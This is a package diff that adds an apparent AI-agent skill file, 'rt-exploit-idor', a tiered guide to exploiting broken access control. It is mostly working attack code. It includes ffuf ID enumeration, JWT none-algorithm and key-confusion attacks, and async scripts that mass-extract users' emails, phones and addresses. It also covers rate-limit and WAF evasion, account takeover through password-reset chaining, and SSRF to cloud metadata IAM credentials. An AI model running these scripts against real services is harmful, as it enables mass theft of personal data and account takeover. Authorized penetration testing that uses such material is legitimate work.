rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-exploit-idor/SKILL.md

@@ -0,0 +1,1693 @@
+---
+name: rt-exploit-idor
+description: "IDOR (Insecure Direct Object Reference) and Broken Access Control testing skill. Covers horizontal privilege escalation, vertical privilege escalation, parameter tampering, UUID enumeration, mass data extraction via IDOR automation, and BOLA (Broken Object Level Authorization) for APIs."
+---
+
+# rt-exploit-idor
+
+## 1. Overview
+
+Insecure Direct Object Reference (IDOR) is a broken access control vulnerability where an application uses user-controllable input to access objects directly without verifying that the requesting user has authorization. IDOR is consistently ranked in the OWASP Top 10 under **A01:2021 - Broken Access Control** and is one of the highest-impact, highest-frequency vulnerabilities found in real-world engagements.
+
+### Why IDOR Matters
+
+- Directly leads to unauthorized data access, account takeovers, PII exfiltration, and full horizontal/vertical privilege escalation.
+- Simple to exploit once identified — no memory corruption, no complex payloads.
+- Automation at scale (mass extraction) can turn a single IDOR into a critical organizational data breach.
+- APIs are particularly vulnerable due to REST patterns exposing object IDs explicitly.
+
+### Taxonomy
+
+| Term | Definition |
+|---|---|
+| IDOR | Accessing an object by directly referencing its ID without authorization check |
+| BOLA | Broken Object Level Authorization — API-specific IDOR (OWASP API Security Top 10 #1) |
+| Horizontal Escalation | Accessing another user's data at the same privilege level |
+| Vertical Escalation | Accessing resources of a higher-privileged role (e.g., user → admin) |
+| BFLA | Broken Function Level Authorization — accessing admin functions as a low-privileged user |
+| Mass Assignment | Sending extra parameters to modify fields the server shouldn't accept from clients |
+
+### Scope and Impact Ratings
+
+| Scenario | CVSS Score (Approximate) | Impact |
+|---|---|---|
+| Read another user's profile | 6.5 (Medium) | PII disclosure |
+| Read all users via mass extraction | 8.6 (High) | Full database exfil |
+| Modify/delete another user's resource | 8.1 (High) | Integrity violation |
+| Escalate to admin role | 9.8 (Critical) | Full application compromise |
+| Access billing/payment data | 9.1 (Critical) | Financial data breach |
+
+---
+
+## 2. Skill Levels
+
+### BEGINNER — Manual Parameter Tampering
+
+**Prerequisites:** Burp Suite Community/Pro, a valid account on the target application, basic HTTP knowledge.
+
+**Goal:** Identify and confirm a single IDOR vulnerability manually.
+
+**Core Concepts:**
+- Every request that contains an ID, number, UUID, slug, or hash referencing a resource is a candidate.
+- The test is: log in as User A, copy a request referencing User A's resource, change the ID to User B's resource ID, observe whether the server returns User B's data.
+
+**Step 1 — Set up Burp Suite proxy**
+
+```bash
+# Launch Burp Suite and configure browser proxy
+# Proxy → Options → 127.0.0.1:8080
+# Install Burp CA certificate in browser
+
+# Alternatively use mitmproxy for lightweight interception
+pip install mitmproxy
+mitmproxy -p 8080
+# or in headless mode:
+mitmdump -p 8080 -w /tmp/capture.mitm
+```
+
+**Step 2 — Enumerate your own object IDs**
+
+```bash
+# While authenticated as User A, navigate to:
+# - Profile page: /api/users/1234
+# - Orders: /api/orders/5678
+# - Documents: /api/documents/9012
+# - Invoices: /invoice/download?id=3456
+
+# Note every ID in requests, responses, and page source
+# Look in: URL path, query parameters, POST body, JSON fields, cookies, hidden form fields
+```
+
+**Step 3 — Create a second test account (User B)**
+
+```bash
+# Register a second account in a different browser session / incognito
+# Note User B's own object IDs by logging in as User B
+# Confirm what User B owns: /api/users/5678 (User B's own profile ID)
+```
+
+**Step 4 — Swap IDs and observe**
+
+```bash
+# In Burp Repeater, take User A's authenticated request:
+GET /api/users/1234 HTTP/1.1
+Host: target.com
+Authorization: Bearer <UserA_JWT>
+
+# Change the ID to User B's ID:
+GET /api/users/5678 HTTP/1.1
+Host: target.com
+Authorization: Bearer <UserA_JWT>
+
+# If response returns User B's data → IDOR confirmed
+```
+
+**Step 5 — Test common ID locations**
+
+```bash
+# URL path
+GET /profile/1337
+GET /account/1337/settings
+GET /documents/1337/download
+
+# Query parameter
+GET /search?user_id=1337
+GET /report?account=1337
+GET /export?invoice_id=1337
+
+# POST body (JSON)
+POST /api/update-email
+{"user_id": 1337, "email": "attacker@evil.com"}
+
+# POST body (form)
+POST /update-profile
+username=victim&user_id=1337&email=attacker@evil.com
+
+# Cookie value
+Cookie: user_id=1337; session=abc123
+
+# Hidden form field
+<input type="hidden" name="account_id" value="1337">
+```
+
+**Beginner Checklist:**
+- [ ] Found at least one numeric ID in requests
+- [ ] Created two test accounts
+- [ ] Successfully accessed User B's data as User A
+- [ ] Documented request/response pair in Burp
+- [ ] Saved screenshot of data mismatch
+
+---
+
+### INTERMEDIATE — Automated Discovery and Horizontal Escalation Mapping
+
+**Prerequisites:** ffuf, Python 3, Burp Pro (optional), basic scripting skills.
+
+**Goal:** Systematically discover IDOR endpoints across an entire application and automate ID enumeration.
+
+**Step 1 — Spider the application to collect all endpoints**
+
+```bash
+# Using katana (fast web crawler)
+go install github.com/projectdiscovery/katana/cmd/katana@latest
+katana -u https://target.com -d 5 -jc -aff -o endpoints.txt
+
+# Using hakrawler
+go install github.com/hakluke/hakrawler@latest
+echo "https://target.com" | hakrawler -d 3 -subs > endpoints.txt
+
+# Using gau (Get All URLs from Wayback, OTX, etc.)
+go install github.com/lc/gau/v2/cmd/gau@latest
+gau target.com > urls_historical.txt
+
+# Combine and filter for ID-like patterns
+cat endpoints.txt urls_historical.txt | grep -E '[0-9]{3,}|[0-9a-f-]{36}' | sort -u > id_endpoints.txt
+```
+
+**Step 2 — Identify ID parameters using ffuf**
+
+```bash
+# Install ffuf
+go install github.com/ffuf/ffuf/v2@latest
+
+# Fuzz for numeric IDs in path
+ffuf -u https://target.com/api/users/FUZZ \
+  -w <(seq 1 10000) \
+  -H "Authorization: Bearer <UserA_JWT>" \
+  -H "Content-Type: application/json" \
+  -mc 200 \
+  -t 50 \
+  -o idor_users_fuzz.json \
+  -of json
+
+# Fuzz for numeric IDs in query parameter
+ffuf -u "https://target.com/profile?id=FUZZ" \
+  -w <(seq 1 5000) \
+  -H "Authorization: Bearer <UserA_JWT>" \
+  -fc 403,404,401 \
+  -mc 200,201,204 \
+  -t 30 \
+  -o idor_profile_fuzz.json \
+  -of json
+
+# Filter by response size to find real vs empty responses
+ffuf -u "https://target.com/api/orders/FUZZ" \
+  -w <(seq 1 50000) \
+  -H "Authorization: Bearer <UserA_JWT>" \
+  -fs 0,12,45 \
+  -mc 200 \
+  -t 100 \
+  -rate 200 \
+  -o idor_orders_fuzz.json \
+  -of json
+```
+
+**Step 3 — Parameter wordlist fuzzing (discover hidden parameters)**
+
+```bash
+# Download Arjun and Param Miner wordlists
+git clone https://github.com/s0md3v/Arjun
+cd Arjun && pip install -r requirements.txt
+
+# Discover hidden GET parameters
+python3 arjun.py -u https://target.com/api/user -m GET -o arjun_get.json
+
+# Discover hidden POST parameters
+python3 arjun.py -u https://target.com/api/update -m POST -o arjun_post.json
+
+# Use ffuf with parameter wordlist
+ffuf -u "https://target.com/api/user?FUZZ=1337" \
+  -w ~/wordlists/burp-parameter-names.txt \
+  -H "Authorization: Bearer <token>" \
+  -mc 200 \
+  -fs 145 \
+  -t 40
+```
+
+**Step 4 — Response comparison to detect IDOR**
+
+```bash
+# Get your own resource response
+curl -s -H "Authorization: Bearer <UserA_JWT>" \
+  https://target.com/api/users/1001 > own_response.json
+
+# Get another user's resource response (IDOR test)
+curl -s -H "Authorization: Bearer <UserA_JWT>" \
+  https://target.com/api/users/1002 > other_response.json
+
+# Compare responses
+diff own_response.json other_response.json
+
+# If different user data is returned → IDOR confirmed
+# Check: different username, email, phone, address, account balance
+jq '.email' own_response.json other_response.json
+```
+
+**Step 5 — Test all HTTP methods per endpoint**
+
+```bash
+# Many IDOR protections only cover GET — test PUT, DELETE, PATCH, POST
+for method in GET POST PUT PATCH DELETE; do
+  echo "Testing $method /api/users/1337"
+  curl -s -X $method \
+    -H "Authorization: Bearer <UserA_JWT>" \
+    -H "Content-Type: application/json" \
+    https://target.com/api/users/1337 \
+    -o /tmp/idor_${method}.json \
+    -w "HTTP Status: %{http_code}\n"
+done
+```
+
+**Step 6 — Test with missing, null, and wildcard IDs**
+
+```bash
+# Null/empty ID
+curl -s -H "Authorization: Bearer <token>" https://target.com/api/users/
+curl -s -H "Authorization: Bearer <token>" https://target.com/api/users/null
+curl -s -H "Authorization: Bearer <token>" https://target.com/api/users/0
+curl -s -H "Authorization: Bearer <token>" https://target.com/api/users/-1
+curl -s -H "Authorization: Bearer <token>" https://target.com/api/users/*
+curl -s -H "Authorization: Bearer <token>" https://target.com/api/users/..
+curl -s -H "Authorization: Bearer <token>" https://target.com/api/users/%2e%2e
+```
+
+**Intermediate Checklist:**
+- [ ] All endpoints with ID patterns collected
+- [ ] ffuf fuzzing complete on 3+ endpoints
+- [ ] Hidden parameters discovered via Arjun
+- [ ] All HTTP methods tested per endpoint
+- [ ] Response diffing confirms data mismatch
+- [ ] Results saved to JSON for autodoc
+
+---
+
+### ADVANCED — Vertical Escalation, UUID Enumeration, and API BOLA
+
+**Prerequisites:** Python 3, JWT manipulation tools, uuid-utils, API documentation (Swagger/OpenAPI), Burp Pro.
+
+**Goal:** Escalate privileges vertically (user → admin), enumerate UUID-protected resources, and map full API BOLA attack surface.
+
+#### Vertical Privilege Escalation
+
+**Step 1 — Identify admin/privileged endpoints**
+
+```bash
+# Collect admin endpoints from JS files and API specs
+cat endpoints.txt | grep -iE 'admin|manage|internal|staff|superuser|root|moderator|elevated'
+
+# Extract from JavaScript source
+gau target.com | grep '\.js$' | while read url; do
+  curl -s "$url" | grep -oE '/api/[a-zA-Z0-9/_-]+' 
+done | sort -u | grep -iE 'admin|manage|staff'
+
+# Download and parse OpenAPI/Swagger spec
+curl -s https://target.com/api/swagger.json -o swagger.json
+jq '.paths | keys[]' swagger.json | grep -iE 'admin|staff|manage'
+```
+
+**Step 2 — Test admin endpoint access with low-privileged token**
+
+```bash
+# Attempt admin function as regular user
+curl -s -X GET \
+  -H "Authorization: Bearer <RegularUser_JWT>" \
+  https://target.com/api/admin/users \
+  -w "\nStatus: %{http_code}"
+
+# Attempt to access admin user list
+curl -s -X GET \
+  -H "Authorization: Bearer <RegularUser_JWT>" \
+  https://target.com/api/admin/users/list \
+  -w "\nStatus: %{http_code}"
+
+# Attempt privilege modification
+curl -s -X POST \
+  -H "Authorization: Bearer <RegularUser_JWT>" \
+  -H "Content-Type: application/json" \
+  -d '{"user_id": 9999, "role": "admin"}' \
+  https://target.com/api/admin/set-role \
+  -w "\nStatus: %{http_code}"
+```
+
+**Step 3 — JWT role manipulation**
+
+```bash
+# Install jwt_tool
+git clone https://github.com/ticarpi/jwt_tool
+pip install -r jwt_tool/requirements.txt
+
+# Decode current JWT
+python3 jwt_tool/jwt_tool.py <your_JWT>
+
+# Modify role claim (if no signature verification)
+python3 jwt_tool/jwt_tool.py <your_JWT> -T -S hs256 -p ""
+# In editor: change "role": "user" to "role": "admin"
+
+# Test with algorithm confusion (RS256 → HS256)
+python3 jwt_tool/jwt_tool.py <your_JWT> -X k -pk public.pem
+
+# None algorithm attack
+python3 jwt_tool/jwt_tool.py <your_JWT> -X a
+```
+
+**Step 4 — Mass assignment attacks**
+
+```bash
+# Try injecting privilege fields in registration/update requests
+curl -s -X POST \
+  -H "Content-Type: application/json" \
+  -d '{
+    "username": "attacker",
+    "email": "attacker@evil.com",
+    "password": "Test1234!",
+    "role": "admin",
+    "is_admin": true,
+    "admin": true,
+    "privilege_level": 99,
+    "account_type": "admin",
+    "permissions": ["read", "write", "admin"]
+  }' \
+  https://target.com/api/register
+
+# Try in profile update
+curl -s -X PUT \
+  -H "Authorization: Bearer <token>" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "email": "newemail@evil.com",
+    "role": "admin",
+    "is_staff": true,
+    "balance": 99999
+  }' \
+  https://target.com/api/users/me
+```
+
+#### UUID/GUID Enumeration
+
+**Step 5 — Analyze UUID version to determine predictability**
+
+```python
+#!/usr/bin/env python3
+# save as: analyze_uuid.py
+import uuid
+import sys
+
+def analyze_uuid(uuid_str):
+    try:
+        u = uuid.UUID(uuid_str)
+        print(f"UUID: {uuid_str}")
+        print(f"Version: {u.version}")
+        print(f"Variant: {u.variant}")
+        if u.version == 1:
+            print(f"Timestamp: {u.time}")
+            print(f"Clock seq: {u.clock_seq}")
+            print(f"Node (MAC): {hex(u.node)}")
+            print("[!] UUIDv1 is TIME-BASED and PREDICTABLE")
+        elif u.version == 4:
+            print("[*] UUIDv4 is random — harder to enumerate")
+        elif u.version == 7:
+            print("[!] UUIDv7 is time-ordered — partially predictable")
+    except ValueError as e:
+        print(f"Invalid UUID: {e}")
+
+if __name__ == "__main__":
+    for arg in sys.argv[1:]:
+        analyze_uuid(arg)
+        print()
+```
+
+```bash
+python3 analyze_uuid.py 550e8400-e29b-41d4-a716-446655440000
+```
+
+**Step 6 — UUIDv1 timestamp-based enumeration**
+
+```python
+#!/usr/bin/env python3
+# save as: uuid_v1_enum.py
+# Generate UUIDv1s around a known timestamp to enumerate adjacent users
+
+import uuid
+import time
+import requests
+
+KNOWN_UUID = "550e8400-e29b-11d4-a716-446655440000"  # Known UUIDv1 from target
+TARGET_URL = "https://target.com/api/users/{}"
+BEARER_TOKEN = "YOUR_JWT_HERE"
+
+def extract_timestamp(uuid_str):
+    u = uuid.UUID(uuid_str)
+    # UUIDv1 timestamp is 100-nanosecond intervals since Oct 15, 1582
+    timestamp = (u.time - 0x01b21dd213814000) / 1e7
+    return timestamp
+
+def gen_nearby_uuids(reference_uuid, count=200, delta_seconds=60):
+    u = uuid.UUID(reference_uuid)
+    base_time = u.time
+    results = []
+    for i in range(-count, count):
+        # Shift by 100ns intervals (1 second = 10_000_000 intervals)
+        new_time = base_time + (i * 10_000_000 * delta_seconds // count)
+        new_time = max(0, min(new_time, 0xFFFFFFFFFFFFFFFF))
+        # Reconstruct UUID with modified time
+        time_low = new_time & 0xFFFFFFFF
+        time_mid = (new_time >> 32) & 0xFFFF
+        time_hi = (new_time >> 48) & 0x0FFF
+        # Combine with original node and clock_seq
+        new_uuid = uuid.UUID(
+            fields=(time_low, time_mid, time_hi | 0x1000,
+                    u.clock_seq_hi_variant, u.clock_seq_low, u.node)
+        )
+        results.append(str(new_uuid))
+    return results
+
+headers = {"Authorization": f"Bearer {BEARER_TOKEN}"}
+candidates = gen_nearby_uuids(KNOWN_UUID)
+
+for candidate_uuid in candidates:
+    try:
+        r = requests.get(TARGET_URL.format(candidate_uuid), headers=headers, timeout=5)
+        if r.status_code == 200:
+            data = r.json()
+            print(f"[HIT] UUID: {candidate_uuid}")
+            print(f"      Data: {data}")
+    except Exception as e:
+        pass
+```
+
+**Step 7 — UUIDv4 brute force (targeted with known prefix patterns)**
+
+```python
+#!/usr/bin/env python3
+# save as: uuid_harvest.py
+# Collect UUIDs from API responses and build an enumeration wordlist
+
+import requests
+import json
+import re
+import sys
+
+UUID_PATTERN = re.compile(
+    r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
+    re.IGNORECASE
+)
+
+TARGET_URL = "https://target.com/api/posts"
+BEARER_TOKEN = "YOUR_JWT_HERE"
+headers = {"Authorization": f"Bearer {BEARER_TOKEN}"}
+
+found_uuids = set()
+
+# Paginate through a public listing endpoint
+for page in range(1, 100):
+    try:
+        r = requests.get(f"{TARGET_URL}?page={page}&limit=100",
+                         headers=headers, timeout=10)
+        if r.status_code != 200:
+            break
+        text = r.text
+        matches = UUID_PATTERN.findall(text)
+        for m in matches:
+            found_uuids.add(m.lower())
+        print(f"Page {page}: +{len(matches)} UUIDs (total: {len(found_uuids)})")
+    except Exception as e:
+        print(f"Error on page {page}: {e}")
+        break
+
+# Save to wordlist for ffuf
+with open("uuid_wordlist.txt", "w") as f:
+    for u in sorted(found_uuids):
+        f.write(u + "\n")
+
+print(f"\n[+] Saved {len(found_uuids)} UUIDs to uuid_wordlist.txt")
+```
+
+```bash
+# Use harvested UUID wordlist with ffuf
+ffuf -u "https://target.com/api/documents/FUZZ" \
+  -w uuid_wordlist.txt \
+  -H "Authorization: Bearer <UserA_JWT>" \
+  -mc 200 \
+  -t 30 \
+  -o idor_uuid_hits.json \
+  -of json
+```
+
+#### API BOLA Testing
+
+**Step 8 — Map the API object model**
+
+```bash
+# Parse Swagger/OpenAPI to find all object ID references
+curl -s https://target.com/v2/api-docs -o api_spec.json
+
+# Extract all path parameters (these are BOLA candidates)
+jq -r '.paths | to_entries[] | .key as $path | .value | to_entries[] | 
+  .value.parameters // [] | .[] | select(.in == "path") | 
+  "\($path) → \(.name) (\(.schema.type // "string"))"' api_spec.json
+
+# List all endpoints with object IDs
+jq -r '.paths | keys[]' api_spec.json | grep -E '\{[^}]+\}'
+```
+
+**Step 9 — Systematic BOLA test matrix**
+
+```bash
+# For each resource type, test cross-user access
+# Resource: /api/v1/accounts/{account_id}/transactions/{transaction_id}
+
+# UserA's own transaction
+curl -s -H "Authorization: Bearer <UserA_JWT>" \
+  "https://target.com/api/v1/accounts/1001/transactions/5001"
+
+# UserA accessing UserB's account (BOLA on account_id)
+curl -s -H "Authorization: Bearer <UserA_JWT>" \
+  "https://target.com/api/v1/accounts/1002/transactions/5001"
+
+# UserA accessing UserB's transaction (BOLA on transaction_id)
+curl -s -H "Authorization: Bearer <UserA_JWT>" \
+  "https://target.com/api/v1/accounts/1001/transactions/5002"
+
+# UserA accessing both different (combined BOLA)
+curl -s -H "Authorization: Bearer <UserA_JWT>" \
+  "https://target.com/api/v1/accounts/1002/transactions/5002"
+```
+
+**Step 10 — Test BOLA in request body (not just URL)**
+
+```bash
+# Some APIs embed object references in the body
+curl -s -X POST \
+  -H "Authorization: Bearer <UserA_JWT>" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "from_account_id": 1002,
+    "to_account_id": 9999,
+    "amount": 100
+  }' \
+  https://target.com/api/v1/transfers
+
+# Nested object references
+curl -s -X GET \
+  -H "Authorization: Bearer <UserA_JWT>" \
+  -H "Content-Type: application/json" \
+  -d '{"filter": {"owner_id": 1002}}' \
+  https://target.com/api/v1/reports/generate
+```
+
+**Advanced Checklist:**
+- [ ] JWT role manipulation tested
+- [ ] Mass assignment fields enumerated and tested
+- [ ] UUID version analyzed for all collected UUIDs
+- [ ] UUIDv1 timestamp enumeration script run
+- [ ] UUID harvest wordlist built from public endpoints
+- [ ] API BOLA matrix completed for all resource types
+- [ ] BOLA in request body tested
+- [ ] Swagger/OpenAPI spec fully parsed
+
+---
+
+### EXPERT — Mass Extraction Automation, WAF Bypass, and Chained Attacks
+
+**Prerequisites:** Advanced Python, asyncio, rate limiting knowledge, WAF fingerprinting, chaining skills with other RT modules.
+
+**Goal:** Automate mass data extraction at scale, bypass WAF protections, and chain IDOR with other vulnerabilities for maximum impact.
+
+#### Mass Extraction with Async Python
+
+**Step 1 — High-speed async IDOR extractor**
+
+```python
+#!/usr/bin/env python3
+# save as: mass_idor_extract.py
+# Mass data extraction via IDOR with async requests, rate limiting, and output
+
+import asyncio
+import aiohttp
+import json
+import csv
+import sys
+import time
+from pathlib import Path
+
+# Configuration
+TARGET_BASE = "https://target.com"
+ENDPOINT = "/api/v1/users/{id}"
+BEARER_TOKEN = "YOUR_JWT_HERE"
+ID_START = 1
+ID_END = 100000
+CONCURRENCY = 50          # Parallel requests
+RATE_LIMIT = 100          # Requests per second
+OUTPUT_FILE = "extracted_users.json"
+CSV_FILE = "extracted_users.csv"
+
+# Fields to extract (for CSV)
+EXTRACT_FIELDS = ["id", "username", "email", "phone", "address", "dob", "role"]
+
+headers = {
+    "Authorization": f"Bearer {BEARER_TOKEN}",
+    "Content-Type": "application/json",
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
+    "Accept": "application/json",
+}
+
+results = []
+errors = []
+semaphore = None
+rate_limiter_tokens = RATE_LIMIT
+last_refill = time.monotonic()
+
+async def fetch_record(session, record_id):
+    global rate_limiter_tokens, last_refill
+    
+    url = TARGET_BASE + ENDPOINT.format(id=record_id)
+    async with semaphore:
+        try:
+            async with session.get(url, headers=headers, timeout=aiohttp.ClientTimeout(total=10)) as resp:
+                if resp.status == 200:
+                    data = await resp.json()
+                    data["_extracted_id"] = record_id
+                    return ("hit", data)
+                elif resp.status == 404:
+                    return ("miss", record_id)
+                elif resp.status == 429:
+                    # Rate limited — back off
+                    await asyncio.sleep(5)
+                    return ("rate_limited", record_id)
+                else:
+                    return ("error", {"id": record_id, "status": resp.status})
+        except Exception as e:
+            return ("exception", {"id": record_id, "error": str(e)})
+
+async def main():
+    global semaphore
+    semaphore = asyncio.Semaphore(CONCURRENCY)
+    
+    hits = []
+    total = ID_END - ID_START + 1
+    processed = 0
+    
+    connector = aiohttp.TCPConnector(limit=CONCURRENCY, ssl=False)
+    async with aiohttp.ClientSession(connector=connector) as session:
+        # Process in batches to control rate
+        batch_size = RATE_LIMIT
+        for batch_start in range(ID_START, ID_END + 1, batch_size):
+            batch_end = min(batch_start + batch_size, ID_END + 1)
+            batch = range(batch_start, batch_end)
+            
+            tasks = [fetch_record(session, i) for i in batch]
+            batch_results = await asyncio.gather(*tasks, return_exceptions=True)
+            
+            for result in batch_results:
+                processed += 1
+                if isinstance(result, tuple):
+                    status, data = result
+                    if status == "hit":
+                        hits.append(data)
+                        print(f"[HIT] ID {data.get('id','?')} | {data.get('email','?')} | {data.get('username','?')}")
+            
+            # Rate limiting: sleep 1 second between batches
+            await asyncio.sleep(1)
+            print(f"Progress: {processed}/{total} ({100*processed//total}%) | Hits: {len(hits)}")
+    
+    # Save JSON output
+    with open(OUTPUT_FILE, "w") as f:
+        json.dump(hits, f, indent=2, default=str)
+    
+    # Save CSV output
+    if hits:
+        with open(CSV_FILE, "w", newline="") as f:
+            writer = csv.DictWriter(f, fieldnames=EXTRACT_FIELDS, extrasaction="ignore")
+            writer.writeheader()
+            writer.writerows(hits)
+    
+    print(f"\n[+] Extraction complete: {len(hits)} records")
+    print(f"[+] JSON: {OUTPUT_FILE}")
+    print(f"[+] CSV:  {CSV_FILE}")
+
+asyncio.run(main())
+```
+
+**Step 2 — UUID-based mass extraction**
+
+```python
+#!/usr/bin/env python3
+# save as: mass_uuid_extract.py
+# Mass extract using a pre-built UUID wordlist
+
+import asyncio
+import aiohttp
+import json
+
+TARGET_BASE = "https://target.com"
+ENDPOINT = "/api/v1/documents/{uuid}"
+BEARER_TOKEN = "YOUR_JWT_HERE"
+UUID_WORDLIST = "uuid_wordlist.txt"
+CONCURRENCY = 30
+OUTPUT_FILE = "extracted_documents.json"
+
+headers = {
+    "Authorization": f"Bearer {BEARER_TOKEN}",
+    "Accept": "application/json",
+}
+
+async def fetch_uuid(session, semaphore, uuid_val):
+    url = TARGET_BASE + ENDPOINT.format(uuid=uuid_val)
+    async with semaphore:
+        try:
+            async with session.get(url, headers=headers,
+                                   timeout=aiohttp.ClientTimeout(total=10)) as resp:
+                if resp.status == 200:
+                    data = await resp.json()
+                    print(f"[HIT] {uuid_val}: {json.dumps(data)[:120]}")
+                    return data
+        except Exception:
+            pass
+    return None
+
+async def main():
+    with open(UUID_WORDLIST) as f:
+        uuids = [line.strip() for line in f if line.strip()]
+    
+    semaphore = asyncio.Semaphore(CONCURRENCY)
+    hits = []
+    
+    connector = aiohttp.TCPConnector(limit=CONCURRENCY, ssl=False)
+    async with aiohttp.ClientSession(connector=connector) as session:
+        tasks = [fetch_uuid(session, semaphore, u) for u in uuids]
+        for coro in asyncio.as_completed(tasks):
+            result = await coro
+            if result:
+                hits.append(result)
+    
+    with open(OUTPUT_FILE, "w") as f:
+        json.dump(hits, f, indent=2, default=str)
+    
+    print(f"\n[+] Extracted {len(hits)} documents → {OUTPUT_FILE}")
+
+asyncio.run(main())
+```
+
+#### WAF Bypass Techniques
+
+**Step 3 — Header-based WAF bypass**
+
+```bash
+# Some WAFs only inspect specific headers or trust internal IP claims
+# Test with X-Forwarded-For spoofing
+curl -s -H "Authorization: Bearer <token>" \
+  -H "X-Forwarded-For: 127.0.0.1" \
+  -H "X-Real-IP: 127.0.0.1" \
+  -H "X-Originating-IP: 127.0.0.1" \
+  -H "X-Remote-IP: 127.0.0.1" \
+  -H "X-Client-IP: 127.0.0.1" \
+  https://target.com/api/admin/users/1337
+
+# Custom headers that bypass WAF
+curl -s -H "Authorization: Bearer <token>" \
+  -H "X-Forwarded-Host: internal.target.com" \
+  -H "X-Original-URL: /api/admin/users/1337" \
+  https://target.com/api/users/1337
+```
+
+**Step 4 — URL encoding and path traversal bypass**
+
+```bash
+# Double URL encoding
+curl -s -H "Authorization: Bearer <token>" \
+  "https://target.com/api/users/%31%33%33%37"
+
+# Unicode normalization
+curl -s -H "Authorization: Bearer <token>" \
+  "https://target.com/api/users/1%E2%80%8B337"
+
+# Path parameter variations
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users/1337/"
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users/1337/."
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users/1337;.json"
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users/1337.json"
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users/1337%00"
+
+# HTTP verb overriding (WAF allows GET but blocks DELETE)
+curl -s -X POST \
+  -H "Authorization: Bearer <token>" \
+  -H "X-HTTP-Method-Override: DELETE" \
+  https://target.com/api/users/1337
+
+curl -s -X POST \
+  -H "Authorization: Bearer <token>" \
+  -H "X-Method-Override: DELETE" \
+  -H "_method: DELETE" \
+  https://target.com/api/users/1337
+```
+
+**Step 5 — Parameter pollution to bypass WAF**
+
+```bash
+# HTTP Parameter Pollution (HPP)
+# WAF checks first parameter; backend uses last
+curl -s -H "Authorization: Bearer <token>" \
+  "https://target.com/api/user?id=<OWN_ID>&id=1337"
+
+# JSON parameter pollution
+curl -s -X POST \
+  -H "Authorization: Bearer <token>" \
+  -H "Content-Type: application/json" \
+  -d '{"user_id": 1001, "user_id": 1337}' \
+  https://target.com/api/user/profile
+
+# Array in parameter
+curl -s -H "Authorization: Bearer <token>" \
+  "https://target.com/api/user?id[]=1001&id[]=1337"
+
+# Nested JSON
+curl -s -X POST \
+  -H "Authorization: Bearer <token>" \
+  -H "Content-Type: application/json" \
+  -d '{"user": {"id": 1337}}' \
+  https://target.com/api/user/get
+```
+
+**Step 6 — Rate limit evasion for mass extraction**
+
+```python
+#!/usr/bin/env python3
+# save as: rate_evade_extract.py
+# Rotate headers and delays to evade rate limiting during mass extraction
+
+import requests
+import time
+import random
+import json
+
+TARGET = "https://target.com/api/users/{}"
+TOKEN = "YOUR_JWT_HERE"
+IDS = range(1, 10000)
+
+USER_AGENTS = [
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15",
+    "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
+    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15",
+    "okhttp/4.11.0",
+    "Dalvik/2.1.0 (Linux; U; Android 13; Pixel 7 Build/TQ3A.230901.001)",
+]
+
+results = []
+
+for record_id in IDS:
+    ua = random.choice(USER_AGENTS)
+    headers = {
+        "Authorization": f"Bearer {TOKEN}",
+        "User-Agent": ua,
+        "Accept": "application/json",
+        "X-Request-ID": f"{random.randint(100000,999999)}",
+    }
+    
+    try:
+        r = requests.get(TARGET.format(record_id), headers=headers, timeout=10)
+        if r.status_code == 200:
+            data = r.json()
+            results.append(data)
+            print(f"[HIT] {record_id}: {data.get('email','?')}")
+        elif r.status_code == 429:
+            sleep_time = random.uniform(10, 30)
+            print(f"[RATE LIMITED] Sleeping {sleep_time:.1f}s")
+            time.sleep(sleep_time)
+            continue
+    except Exception as e:
+        print(f"[ERR] {record_id}: {e}")
+    
+    # Random delay: 0.05 to 0.5 seconds
+    time.sleep(random.uniform(0.05, 0.5))
+
+with open("mass_extract_results.json", "w") as f:
+    json.dump(results, f, indent=2)
+
+print(f"\n[+] Extracted {len(results)} records")
+```
+
+**Step 7 — Chain IDOR with account takeover**
+
+```bash
+# Phase 1: IDOR to read victim's email/phone
+victim_data=$(curl -s -H "Authorization: Bearer <AttackerJWT>" \
+  https://target.com/api/users/1337)
+echo $victim_data | jq '.email'
+
+# Phase 2: Use victim email in password reset
+victim_email=$(echo $victim_data | jq -r '.email')
+curl -s -X POST \
+  -H "Content-Type: application/json" \
+  -d "{\"email\": \"$victim_email\"}" \
+  https://target.com/api/auth/reset-password
+
+# Phase 3: IDOR to read reset token from victim's profile
+curl -s -H "Authorization: Bearer <AttackerJWT>" \
+  "https://target.com/api/users/1337/reset-token"
+
+# Phase 4: Use token to set new password
+curl -s -X POST \
+  -H "Content-Type: application/json" \
+  -d '{"token": "<STOLEN_RESET_TOKEN>", "new_password": "Hacked123!"}' \
+  https://target.com/api/auth/confirm-reset
+```
+
+**Step 8 — Chain IDOR with SSRF (via URL parameters)**
+
+```bash
+# If IDOR endpoint accepts URL or file path
+curl -s -H "Authorization: Bearer <token>" \
+  "https://target.com/api/avatar?user_id=1337&url=http://169.254.169.254/latest/meta-data/"
+
+# Or via POST body
+curl -s -X POST \
+  -H "Authorization: Bearer <token>" \
+  -H "Content-Type: application/json" \
+  -d '{"user_id": 1337, "profile_picture_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}' \
+  https://target.com/api/profile/update
+```
+
+**Expert Checklist:**
+- [ ] Async mass extraction script deployed and run
+- [ ] UUID wordlist mass extraction complete
+- [ ] WAF bypass techniques tested (header, encoding, HPP, verb override)
+- [ ] Rate limit evasion implemented
+- [ ] IDOR chained with account takeover
